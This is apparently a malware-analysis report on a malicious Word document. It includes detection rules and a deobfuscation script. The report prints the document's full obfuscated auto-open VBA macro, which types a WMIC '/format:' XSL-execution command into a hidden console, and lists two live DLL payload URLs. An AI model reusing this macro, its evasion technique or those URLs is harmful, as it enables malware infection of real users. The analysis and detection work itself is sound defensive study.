Verdict: MALICIOUS
Risk Score: 238

Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Word document whose VBA project runs on open (Sub autoopen). Every operative string is rebuilt at run time from fragments, with single characters produced as Chr(n), Chr(Sqr(n)) or Chr(Log(x) / Log(b)); the decoded values are given in the chain below. The macro instantiates scripting.filesystemobject and wscript.shell through CreateObject. It does not call the VBA Shell() function: the OLE_VBA_SHELL hit is on the trailing "shell" fragment of the string "wscript.shell", and process creation goes through WScript.Shell.Run with window style 0 (hidden) and no wait, each call wrapped in `On Error Resume Next: Wscript.Quit = ...`.

Execution chain recovered from the source:

1. autoopen busy-waits for two seconds (TimeValue("00:00:02")), deletes the first inline shape and resizes the next one, then creates an empty Unicode text file %APPDATA%\<name>.txt, where <name> is picked at random from let_s_speech, the_burning_zone and i_do_beseech (made_you_breathe).
2. comes_here_between runs `notepad "<that file>"` hidden. death_the_court locates it with FindWindowExA (window class "notepad", child class "edit") and posts the text of every document paragraph longer than three characters into the edit control as WM_CHAR (&H102) messages, then WM_COMMAND (&H111) with command ID 3 (File > Save in classic Notepad) and WM_CLOSE (&H10). The document body is thereby written to disk by Notepad rather than by the macro.
3. you_now_he runs `wmic` hidden, waits, renames the .txt to .xsl (Name ... As), finds the console window (class "consolewindowclass") and posts `process list /format:"<path>.xsl"` followed by a carriage return, one WM_CHAR per character with a busy loop between characters.

Step 3 is XSL script processing through WMIC (ATT&CK T1220, in addition to the two techniques listed above). The script that actually fetches and runs the next stage is the document's own body text, not the macro, which is consistent with the two bentorium.com DLL URLs and the http://www.w3.org/1999/XSL/Transform namespace being found in the OLE body rather than in the VBA. The staged .xsl was not carved in this analysis, so beyond the URLs themselves this report does not establish how https://bentorium.com/vapirum409.dll and https://bentorium.com/coclew.dll are fetched or loaded. Note for detection: wmic.exe is spawned with no arguments and the `/format:` string is injected as keystrokes, so it never appears on a process command line.
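A telemetry check for the chain described above, written for this report as an added example (it is not the analyzer's code). The events are constructed to mirror what process-creation logging such as Sysmon Event ID 1, plus a file-rename event from an EDR, would record for this sample; the paths, PIDs and field names are this example's own. The point it makes: a rule keyed on a wmic.exe command line containing "/format:" cannot fire here, because wmic is spawned as bare `wmic` and the `process list /format:"...xsl"` text is posted into its console window as keystrokes. What remains observable is WINWORD.EXE as the parent of notepad.exe and wmic.exe, and an Office process renaming a file under AppData to .xsl.

```python
import ntpath

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
DRIVEN = {"wmic.exe", "notepad.exe"}     # the binaries this sample steers from Word

# Constructed process-creation events (hypothetical paths, user and PIDs):
# the sample's two launches plus one ordinary wmic use for contrast.
PROCESS_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'notepad "C:\Users\u\AppData\Roaming\i_do_beseech.txt"',
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"pid": 4188, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     # the macro runs bare "wmic"; the /format: arguments are posted as WM_CHAR
     # keystrokes afterwards and never appear on the command line
     "cmdline": "wmic",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"pid": 5012, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic os get caption",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
]

# Constructed file event for the macro's `Name anything_so As and_queen_pol`
# step (the rename is done by Word itself, not by notepad or wmic).
FILE_EVENTS = [
    {"image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "op": "rename",
     "path": r"C:\Users\u\AppData\Roaming\i_do_beseech.txt",
     "target": r"C:\Users\u\AppData\Roaming\i_do_beseech.xsl"},
]


def base(path):
    return ntpath.basename(path).lower()


def rule_wmic_format_cmdline(events):
    """The usual T1220 rule: wmic.exe whose command line carries /format:."""
    return [e for e in events
            if base(e["image"]) == "wmic.exe" and "/format:" in e["cmdline"].lower()]


def rule_office_spawns_driven(events):
    """Argument-independent: an Office process as parent of wmic.exe or notepad.exe."""
    return [e for e in events
            if base(e["parent_image"]) in OFFICE and base(e["image"]) in DRIVEN]


def rule_office_writes_xsl(events):
    """An Office process creating or renaming a .xsl under the user's AppData."""
    hits = []
    for e in events:
        target = e.get("target", e["path"]).lower()
        if base(e["image"]) in OFFICE and target.endswith(".xsl") and "\\appdata\\" in target:
            hits.append(e)
    return hits


if __name__ == "__main__":
    print("cmdline rule :", [e["pid"] for e in rule_wmic_format_cmdline(PROCESS_EVENTS)])
    print("parent rule  :", [e["pid"] for e in rule_office_spawns_driven(PROCESS_EVENTS)])
    print("xsl rule     :", [e["target"] for e in rule_office_writes_xsl(FILE_EVENTS)])
```

The command-line rule is still worth keeping for the ordinary `wmic ... /format:` case; it simply has to be paired with the parent-child and file rules for a sample that types its arguments in through PostMessageA.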
Heuristics (9)

- VBA macros detected (medium, 5 related findings) OLE_VBA_MACROS: Document contains VBA macro code.
- Potential Shell call in VBA (critical) OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script: `"." & _ "shell"` (module and_as_one). This is the tail of the obfuscated string "wscript.shell", not a call to the VBA Shell() function; the severity is still warranted because that string is what CreateObject(...).Run is built from.
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script: `Set up_another_room = CreateObject(distress_or)`, where distress_or decodes to "scripting.filesystemobject". The two other CreateObject calls (comes_here_between, you_now_he) receive more_merit_is, which decodes to "wscript.shell".
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. Source was recovered for this sample (macros.bas below), so here the finding corroborates the source-level findings rather than standing in for them; the report does not flag a p-code/source mismatch.
- AutoOpen macro (low) OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script: `Sub autoopen()`.
- Environ() call (env variable access) (low) OLE_VBA_ENVIRON: Environ() call (env variable access). Matched line in script: `ham_thou_hast = Environ(close_within)`, where close_within is "appdata"; the staged .txt/.xsl file is written under %APPDATA%.
- Reference to Windows Script Host (high) SC_STR_WSCRIPT: Reference to Windows Script Host.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. The "no modern VBA project was recovered" wording does not hold for this sample (see Extracted artifacts); treat this finding as redundant with OLE_VBA_AUTOOPEN.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - https://bentorium.com/vapirum409.dll (in document text, OLE body)
  - https://bentorium.com/coclew.dll (in document text, OLE body)
  - http://www.w3.org/1999/XSL/Transform (in document text, OLE body; the XSLT namespace, consistent with the body carrying the stylesheet the macro feeds to wmic)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body; Office schema namespace, benign on its own)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body; Office schema namespace, benign on its own)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body; Office schema namespace, benign on its own)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9883 bytes | 0dbc5efa7590f70ab79ad200fc4bc0909f9deeec89b3419ff73202adff299a5a |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public distress_or As String
Sub autoopen()
Dim to_beard_me As String
to_beard_me = "00" & _
":" & _
Chr(Log(7.97664430768725E+22) / Log(3)) & _
Chr(Sqr(2304)) & _
":" & _
Chr(Sqr(2304)) & _
"2"
ActiveDocument.InlineShapes(1).Delete
ActiveDocument.InlineShapes(1).ScaleHeight = 66
ActiveDocument.InlineShapes(1).ScaleWidth = 80
but_truly_in = Now() + TimeValue(to_beard_me)
While Now() < but_truly_in
Debug.Print Now()
Wend
Dim up_another_room As Object
Dim distress_or As String
distress_or = "scripting.filesystemob" & _
"ject"
and_ophelia
Set up_another_room = CreateObject(distress_or)
Call made_you_breathe(up_another_room)
'o god hath kill
bawds_the_murther
his_list_if
d_since_so
End Sub
Attribute VB_Name = "but_a_radiant"
Public question_you_could As Long
Public Const have_i_th As Long = &H102
Public and_we_find As Long
Public old_grandsire As Object
Public o_give_thee As String
Public lick_absurd_pomp As Variant
Public anything_so As String
Public ham_thou_hast As String
Sub made_you_breathe(great_power_t)
Dim of_it_springs As String
of_it_springs = "l" & _
"et_s_speec" & _
"h"
Dim of_liquor_exit As String
of_liquor_exit = "the" & _
Chr(95) & _
Chr(98) & _
Chr(Sqr(13689)) & _
Chr(Sqr(12996)) & _
"n" & _
Chr(Log(1.64550455732121E+63) / Log(4)) & _
"n" & _
"g" & _
"_zon" & _
Chr(Log(2.53530120045646E+30) / Log(2))
Dim upon_your_coronation As String
upon_your_coronation = "i_" & _
Chr(Log(5.15377520732011E+47) / Log(3)) & _
Chr(Log(9.12975816651136E+52) / Log(3)) & _
Chr(95) & _
Chr(Sqr(9604)) & _
"eseech"
lick_absurd_pomp = Array(of_it_springs, of_liquor_exit, upon_your_coronation)
For and_we_find = 1 To 325
o_give_thee = lick_absurd_pomp(Int((UBound(lick_absurd_pomp) - LBound(lick_absurd_pomp) + 1) * Rnd + LBound(lick_absurd_pomp)))
Next and_we_find
ham_thou_hast = Environ(close_within)
anything_so = ham_thou_hast & under_the_summit & o_give_thee & chanson_will
Set old_grandsire = great_power_t.CreateTextFile(anything_so, True, True)
old_grandsire.Close
End Sub
Attribute VB_Name = "now_our_scale"
Public and_queen_pol As String
Public ears_ham_why As String
Public Const thus_hath As Long = &H112
Public Const with_imagination_mar As Long = &H10
Public Const within_mother_father As Long = &H3
Sub death_the_court()
treasure_open = Now() + TimeValue(god_s_the)
While Now() < treasure_open
Wend
of_all_without = maker_the_mobled(0, 0, tis_seen_of, vbNullString)
shepherds_give_these = maker_the_mobled(of_all_without, 0, day_horatio, vbNullString)
For Each times_our_practices In ActiveDocument.Paragraphs
ears_ham_why = times_our_practices.Range.Text
If Len(ears_ham_why) > 3 Then
For pooh_you_shall = 1 To Len(ears_ham_why)
For summit_of_uncurrent = 1 To 684
of_i_will = Asc(Mid(ears_ham_why, pooh_you_shall, 1))
Next summit_of_uncurrent
this_relief shepherds_give_these, have_i_th, of_i_will, 0
Next pooh_you_shall
End If
Next times_our_practices
argal_he_likewise = Now() + TimeValue(god_s_the)
While Now() < argal_he_likewise
Wend
this_relief of_all_without, more_dear_mother, within_mother_father, of_twelve_i
'such a day and to
so_gracious_figure = Now() + TimeValue(god_s_the)
While Now() < so_gracious_figure
Wend
this_relief of_all_without, with_imagination_mar, 0, 0
End Sub
Attribute VB_Name = "immediately_pours"
Public therefore_tis As String
Public an_exact_command As Long
Public and_did_you As String
Public times_our_practices As Paragraph
Public Declare PtrSafe Function maker_the_mobled Lib "user32.dll" Alias "FindWindowExA" (ByVal and_not_thy As Long, ByVal diseases_desperate_appliance As Long, ByVal d_his_wonder As String, ByVal they_bore_arms As String) As Long
Public Declare PtrSafe Function this_relief Lib "user32.dll" Alias "PostMessageA" (ByVal strange_that_sense As Long, ByVal there_s_slave As Long, ByVal sworn_t_he As Long, ByVal and_wretched_rash As Long) As Long
Public Const of_twelve_i As Long = &H46
Public Const more_dear_mother As Long = &H111
Sub comes_here_between()
as_england_ham = Now() + TimeValue(god_s_the)
While Now() < as_england_ham
Wend
sailor_god = and_means_may & Chr(34) & anything_so & Chr(34)
On Error Resume Next: Wscript.Quit = ("" & CreateObject(((more_merit_is))).Run((sailor_god), (0), (0)))
a_kind_of = Now() + TimeValue(god_s_the)
While Now() < a_kind_of
Wend
End Sub
Attribute VB_Name = "contrive_against_your"
Public and_means_may As String
Sub and_ophelia()
and_means_may = "notepad "
poison_of
End Sub
Attribute VB_Name = "in_together"
Public chanson_will As String
Sub poison_of()
chanson_will = ".tx" & _
Chr(116)
prithee_take_thy
End Sub
Attribute VB_Name = "tis_very_much"
Public and_keep_the As String
Sub prithee_take_thy()
and_keep_the = Chr(Sqr(9801)) & _
Chr(Sqr(12321)) & _
Chr(Sqr(12100)) & _
"s" & _
"o" & _
Chr(Log(3.38139191352273E+51) / Log(3)) & _
Chr(Log(6.42775217703596E+60) / Log(4)) & _
"w" & _
Chr(Log(4.05648192073033E+31) / Log(2)) & _
"ndowclass"
with_an_t
End Sub
Attribute VB_Name = "joy_their_course"
Public close_within As String
Sub with_an_t()
close_within = "appdata"
revolution_and
End Sub
Attribute VB_Name = "where_sadly"
Public away_with_blood As String
Sub revolution_and()
away_with_blood = Chr(Sqr(14161)) & _
Chr(109) & _
Chr(Log(4.05648192073033E+31) / Log(2)) & _
Chr(Log(4.01734511064748E+59) / Log(4))
circumstance_get
End Sub
Attribute VB_Name = "the_breathing"
Public tis_seen_of As String
Sub circumstance_get()
tis_seen_of = "n" & _
Chr(Log(6.73998666678766E+66) / Log(4)) & _
Chr(Log(6.90174634679056E+69) / Log(4)) & _
Chr(Log(2.53530120045646E+30) / Log(2)) & _
Chr(112) & _
Chr(97) & _
"d"
gives_the
End Sub
Attribute VB_Name = "shrewdly_it_is"
Public day_horatio As String
Sub gives_the()
day_horatio = Chr(Log(2.53530120045646E+30) / Log(2)) & _
"d" & _
Chr(105) & _
"t"
yet_the_dust
End Sub
Attribute VB_Name = "o_good_cornelius"
Public under_the_summit As String
Sub yet_the_dust()
under_the_summit = Chr(Sqr(8464))
shot_within
End Sub
Attribute VB_Name = "and_kettledrums"
Public god_s_the As String
Sub shot_within()
god_s_the = "00:0" & _
Chr(48) & _
Chr(Log(8.30767497365572E+34) / Log(4)) & _
Chr(48) & _
Chr(Log(1.26765060022823E+30) / Log(4))
and_held_me
End Sub
Attribute VB_Name = "and_as_one"
Public more_merit_is As String
Sub and_held_me()
more_merit_is = "wscr" & _
"ip" & _
Chr(Log(2.21853123446226E+55) / Log(3)) & _
"." & _
"shell"
how_now_laertes
End Sub
Attribute VB_Name = "and_in_thee"
Public themselves_laugh_whose As String
Sub how_now_laertes()
themselves_laugh_whose = "." & _
Chr(120) & _
Chr(Sqr(13225)) & _
"l"
us_thou_art
End Sub
Attribute VB_Name = "and_most_humbly"
Public heavy_headed As String
Sub us_thou_art()
heavy_headed = "process li" & _
Chr(115) & _
Chr(Sqr(13456)) & _
Chr(Log(4294967296#) / Log(2)) & _
Chr(47) & _
"f" & _
Chr(Log(6.73998666678766E+66) / Log(4)) & _
"r" & _
Chr(Sqr(11881)) & _
Chr(Sqr(9409)) & _
Chr(Sqr(13456)) & _
":"
End Sub
Attribute VB_Name = "swear_t_o"
Sub bawds_the_murther()
comes_here_between
End Sub
Attribute VB_Name = "take_heed_and"
Sub his_list_if()
his_conceit_that
End Sub
Attribute VB_Name = "come_my_heart"
Sub his_conceit_that()
a_mineral
End Sub
Attribute VB_Name = "sometime_sister"
Sub a_mineral()
daughter_shown_gives
End Sub
Attribute VB_Name = "opposition_take_my"
Sub daughter_shown_gives()
death_the_court
End Sub
Attribute VB_Name = "but_my_honour"
Sub d_since_so()
enough_what_we
End Sub
Attribute VB_Name = "come_my_lord"
Sub enough_what_we()
our_hope_your
End Sub
Attribute VB_Name = "to_parley"
Sub our_hope_your()
that_grows
End Sub
Attribute VB_Name = "of_frame_outlives"
Sub that_grows()
play_upon_our
End Sub
Attribute VB_Name = "i_shall_first"
Sub play_upon_our()
in_corruption_from
End Sub
Attribute VB_Name = "a_passionate"
Sub in_corruption_from()
commission_will
End Sub
Attribute VB_Name = "command_i"
Sub commission_will()
it_doth_try
End Sub
Attribute VB_Name = "the_toe_of"
Sub it_doth_try()
pol_come_and
End Sub
Attribute VB_Name = "hill_of_the"
Sub pol_come_and()
you_now_he
End Sub
Attribute VB_Name = "confess_he_hath"
Sub you_now_he()
On Error Resume Next: Wscript.Quit = ("" & CreateObject(((more_merit_is))).Run((away_with_blood), (0), (0)))
history_guil_faith = Now() + TimeValue(god_s_the)
While Now() < history_guil_faith
Debug.Print Now()
Wend
and_queen_pol = Replace(anything_so, chanson_will, themselves_laugh_whose)
Name anything_so As and_queen_pol
therefore_tis = heavy_headed & Chr(34) & and_queen_pol & Chr(34)
Debug.Print therefore_tis
For an_exact_command = 1 To Len(therefore_tis)
For question_you_could = 1 To 71362
health_and = Asc(Left$(Mid$(therefore_tis, an_exact_command), 1))
Next question_you_could
king_queen_is = maker_the_mobled(0, 0, and_keep_the, vbNullString)
On Error Resume Next: Wscript.Quit = ("" & this_relief((king_queen_is), (have_i_th), (health_and), (0)))
Next an_exact_command
On Error Resume Next: Wscript.Quit = ("" & this_relief((king_queen_is), (have_i_th), (Asc(vbNewLine)), (0)))
End Sub
Attribute VB_Name = "as_kill_d"
Attribute VB_Name = "ghost_queen_i"
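The macro above never writes a sensitive string literally: each one is assembled from fragments, and individual characters are produced as Chr(n), Chr(Sqr(n)) or Chr(Log(x) / Log(b)), i.e. a character code hidden as a perfect square or as an integer power of 2, 3 or 4. The following decoder is an added example for this report, not code from the analyzer or from the sample; SAMPLE_VBA is an excerpt copied from the macros.bas preview, and the function names are this example's own. It handles the general form of this obfuscation rather than only the strings shown, and refuses (instead of guessing) any assignment whose value depends on runtime state such as Environ() or another variable.

```python
import math
import re

# Excerpt of the extracted macro (assignments copied verbatim). The last line is
# runtime-dependent and is included to show it is skipped rather than guessed.
SAMPLE_VBA = '''
more_merit_is = "wscr" & _
"ip" & _
Chr(Log(2.21853123446226E+55) / Log(3)) & _
"." & _
"shell"
themselves_laugh_whose = "." & _
Chr(120) & _
Chr(Sqr(13225)) & _
"l"
away_with_blood = Chr(Sqr(14161)) & _
Chr(109) & _
Chr(Log(4.05648192073033E+31) / Log(2)) & _
Chr(Log(4.01734511064748E+59) / Log(4))
heavy_headed = "process li" & _
Chr(115) & _
Chr(Sqr(13456)) & _
Chr(Log(4294967296#) / Log(2)) & _
Chr(47) & _
"f" & _
Chr(Log(6.73998666678766E+66) / Log(4)) & _
"r" & _
Chr(Sqr(11881)) & _
Chr(Sqr(9409)) & _
Chr(Sqr(13456)) & _
":"
sailor_god = and_means_may & Chr(34) & anything_so & Chr(34)
'''

NUM = r"\d[\d.]*(?:E[+-]?\d+)?#?"          # '#' is VBA's Double literal suffix
TERM = re.compile(
    r'"(?P<lit>[^"]*)"'
    rf"|Chr\(\s*(?P<code>{NUM})\s*\)"
    rf"|Chr\(\s*Sqr\(\s*(?P<sqr>{NUM})\s*\)\s*\)"
    rf"|Chr\(\s*Log\(\s*(?P<x>{NUM})\s*\)\s*/\s*Log\(\s*(?P<b>{NUM})\s*\)\s*\)",
    re.IGNORECASE,
)
# name = expr, where expr spans every following line that ends in the
# VBA continuation marker "_".
ASSIGN = re.compile(r"^[ \t]*(\w+)[ \t]*=[ \t]*((?:[^\n]*_[ \t]*\n)*[^\n]*)", re.M)


def vba_number(text):
    return float(text.rstrip("#"))


def decode_expr(expr):
    """Evaluate a VBA '&' concatenation of string literals and Chr() terms."""
    flat = re.sub(r"_[ \t]*\n", " ", expr)      # join "& _" continuations
    out, pos = [], 0
    for m in TERM.finditer(flat):
        # Anything between terms other than whitespace and '&' (an identifier,
        # Environ(), Now(), ...) makes the value runtime-dependent: refuse it
        # rather than emit a partial, misleading string.
        gap = flat[pos:m.start()].strip(" \t&")
        if gap:
            raise ValueError(f"not statically decodable: {gap!r}")
        pos = m.end()
        if m["lit"] is not None:
            out.append(m["lit"])
            continue
        if m["code"] is not None:
            code = vba_number(m["code"])
        elif m["sqr"] is not None:
            code = math.sqrt(vba_number(m["sqr"]))
        else:
            code = math.log(vba_number(m["x"])) / math.log(vba_number(m["b"]))
        # VBA Chr() rounds a Double argument to the nearest integer. The
        # Log()/Log() quotients come out a few ulps off (e.g. 104.99999...),
        # so int() truncation would mis-decode them; round() matches VBA.
        out.append(chr(round(code)))
    if flat[pos:].strip(" \t&"):
        raise ValueError(f"not statically decodable: {flat[pos:].strip()!r}")
    return "".join(out)


def decode_assignments(vba_source):
    """Return {variable: decoded string} for every statically decodable assignment."""
    decoded = {}
    for m in ASSIGN.finditer(vba_source):
        try:
            decoded[m.group(1)] = decode_expr(m.group(2))
        except ValueError:
            pass            # runtime-dependent (Environ, Now, other variables)
    return decoded


if __name__ == "__main__":
    for name, value in decode_assignments(SAMPLE_VBA).items():
        print(f"{name:24s} = {value!r}")
```

Run against the full macros.bas rather than the excerpt, the same two regexes recover every constant string the macro builds (the "notepad", "edit" and "consolewindowclass" window classes, "appdata", ".txt", ".xsl", the "00:00:02" sleep interval and the three candidate file names); the runtime-dependent ones (the full file path, the two Run command lines) are then a one-line join of the decoded parts.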